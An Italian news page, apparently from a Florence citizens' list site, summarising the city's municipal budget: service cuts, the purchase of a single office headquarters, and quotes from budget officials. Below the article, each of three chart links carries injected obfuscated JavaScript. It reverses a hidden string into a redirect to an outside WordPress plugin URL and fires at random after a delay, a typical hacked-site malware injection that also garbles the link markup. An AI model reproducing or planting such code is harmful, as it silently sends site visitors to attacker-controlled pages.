Bilancio comunale, un grafico per capire in maniera chiara come funziona

image_pdfimage_print

Un miliardo di euro: è il bilancio comunale. Ecco i tagli, gli investimenti. E qualche sorpresa.

i conti devono tornare sempre in pari. Quindi ai minori trasferimenti da Stato e Regione, tributi invariati per i cittadini e interessi fissi sui mutui, corrispondono risparmi sulle bollette, nessuna spesa extra per gli uffici comunali (-10% anche sull’ufficio del sindaco Matteo Renzi), e aumenti su servizi (dai cimiteri alle mense scolastiche, per i più ricchi) e sul suolo pubblico. Ma la vera operazione d’investimento che caratterizza il primo bilancio preventivo della nuova amministrazione sarà l’acquisto della sua nuova «casa». La spesa più grande che si trova a sostenere il Comune di Firenze, invece, resta quella per il funzionamento della «macchina»; vale a dire gli stipendi per i suoi dipendenti, circa 5 mila, gli affitti delle sue sedi, e tutti i costi generali degli uffici, dalla carta alla corrente elettrica.

[Qui la valutazione politica del bilancio a cura della lista di cittadinanza perUnaltracittà]

Ed è proprio questa macro voce che la nuova giunta si è impegnata a tagliare. Non a caso la parola d’ordine dell’assessore al bilancio, Angelo Falchetti, è «razionalizzazione». «Abbiamo agito— spiega— su tutte le spese comprimibili continuando un percorso che era stato già iniziato, facendo nuovi contratti per le utenze ed eliminando gli acquisti non indispensabili, che porterà al risparmio di qualche milione di euro». Rimangono invariati i servizi sull’istruzione e sul sociale: «Una dura fatica— continua— che non potrà ripetersi se continueranno a diminuire i finanziamenti dallo Stato». Aumentano gli impegni di spesa per la viabilità, quindi per eliminare le famigerate buche, e quelle per la polizia municipale. Ma fra tutti i capitoli di spesa salta all’occhio il più piccolo: il turismo. Possibile che una città d’arte come Firenze spenda così poco? «La competenza — risponde l’assessore — è regionale». Come si diceva l’acquisto di una sede unica per gli uffici comunali (110 milioni di euro) rappresenta l’investimento più consistente del Comune, che sarà finanziato attraverso una parte delle entrate dalla vendita degli immobili comunali: «Lo Stato dovrebbe incentivare gli investimenti — afferma l’assessore— e invece i Comuni sono costretti a vendere i propri beni e alla fine finiscono per pagare comunque allo Stato l’Iva che credo che dovrebbe essere diminuita». Altro elemento di preoccupazione: «I Comuni— dice il presidente della commissione bilancio Massimo Fratini — non possono fare una programmazione certa perché non esiste una scadenza sui rimborsi dallo Stato. Ci impegneremo a vigilare e sollecitarli».

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/04/bilancio-comunale-il-comune-vende.jpg”>Le entrate
Le entrate
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/04/bilancio-comunale-tre-milioni-in-meno-di-multe.jpg”>Le multe
Le multe
$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.altracitta.org/wp-content/uploads/2010/04/bilancio-comunale-tributi-procapite.jpg”>I tributi procapite
I tributi procapite

[Fonte Corriere Fiorentino]

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *